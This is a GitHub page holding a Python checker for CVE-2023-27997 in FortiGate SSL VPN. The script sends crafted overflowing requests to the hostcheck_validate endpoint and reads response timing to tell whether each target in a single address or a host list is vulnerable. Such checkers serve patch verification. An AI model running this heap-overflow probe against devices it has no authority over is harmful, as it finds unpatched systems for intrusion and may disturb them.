-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE-2023-27997.py
116 lines (91 loc) · 3.74 KB
/
CVE-2023-27997.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
#!/usr/bin/env python3
import argparse
import requests
import struct
import hashlib
import sys
import os
import re
from urllib3.exceptions import InsecureRequestWarning
from scipy.stats import ttest_ind
import numpy as np
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# Default 400 requests with valid length and 400 requests with too high of a length
# In most cases, we should break out of the loop long before we hit this number.
REQUESTS_PER_GROUP = 400
def gen_enc_hdr(salt, l):
magic = b"GCC is the GNU Compiler Collection."
ks = hashlib.md5(salt + b"00bfbfbf" + magic).digest()
length = struct.pack("<H", l)
return "00bfbfbf{:02x}{:02x}".format(length[0] ^ ks[0], length[1] ^ ks[1])
def make_req(session, baseurl, salt, allocsize, reqsize):
payload = gen_enc_hdr(salt, reqsize) + "41" * allocsize
payload = "ajax=1&username=test&realm=&enc=" + payload
r = session.post(
baseurl + "/remote/hostcheck_validate",
headers={"content-type": "application/x-www-form-urlencoded"},
verify=False,
data=payload,
)
return r
def reject_outliers(data):
# This rejects ~25% of responses, but gives us much better sensitivity by filtering out random spikes in latency
q3 = np.quantile(data, 0.75)
return list(filter(lambda x: x <= q3, data))
def check_stats(regular, overflow):
overflow = reject_outliers(overflow)
regular = reject_outliers(regular)
t_stat = ttest_ind(overflow, regular, equal_var=False)
return len(overflow), len(regular), t_stat
def check_target(baseurl):
r = requests.get(baseurl + "/remote/info", verify=False)
reg = re.compile("salt='([0-9a-f]{8})'")
matches = reg.findall(r.text)
if len(matches) != 1:
return "ERROR: not FortiGate ssl vpn?"
salt = matches[0].encode()
# allocations of size 0xe000+1-0x10000 are all in the same size class
# we leave a 2KiB gap after our allocation but before the next chunk, so vulnerable devices will only corrupt unused memory
alloc_size = 0xF800
overflow = []
regular = []
s = requests.Session()
for i in range(REQUESTS_PER_GROUP):
r1 = make_req(s, baseurl, salt, alloc_size, alloc_size + 0xF0)
overflow.append(r1.elapsed.microseconds)
r2 = make_req(s, baseurl, salt, alloc_size, alloc_size // 2)
regular.append(r2.elapsed.microseconds)
if i > 20 and i % 10 == 0:
nr, no, t = check_stats(regular, overflow)
if nr > 20 and no > 20 and t.pvalue < 0.001:
break
_, _, t_stat = check_stats(regular, overflow)
if t_stat.pvalue > 0.001 or (-2 < t_stat.statistic < 2):
print("WARNING: Low confidence results.")
if t_stat.statistic < -0.5:
return "Patched"
elif t_stat.statistic > 0.5:
return "Vulnerable"
else:
return "Unknown"
if __name__ == "__main__":
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", help="Single target IP and port (e.g., 192.168.0.1:443)")
group.add_argument("-f", "--file-list", help="File containing IP and port pairs in 'ip:port' format")
args = parser.parse_args()
if args.url:
ip, port = args.url.split(":")
baseurl = f"https://{ip}:{port}"
print("Checking " + baseurl)
print(check_target(baseurl))
elif args.file_list:
with open(args.file_list, "r") as file:
for line in file:
line = line.strip()
if line:
ip, port = line.split(":")
baseurl = f"https://{ip}:{port}"
print("Checking " + baseurl)
print(check_target(baseurl))
print()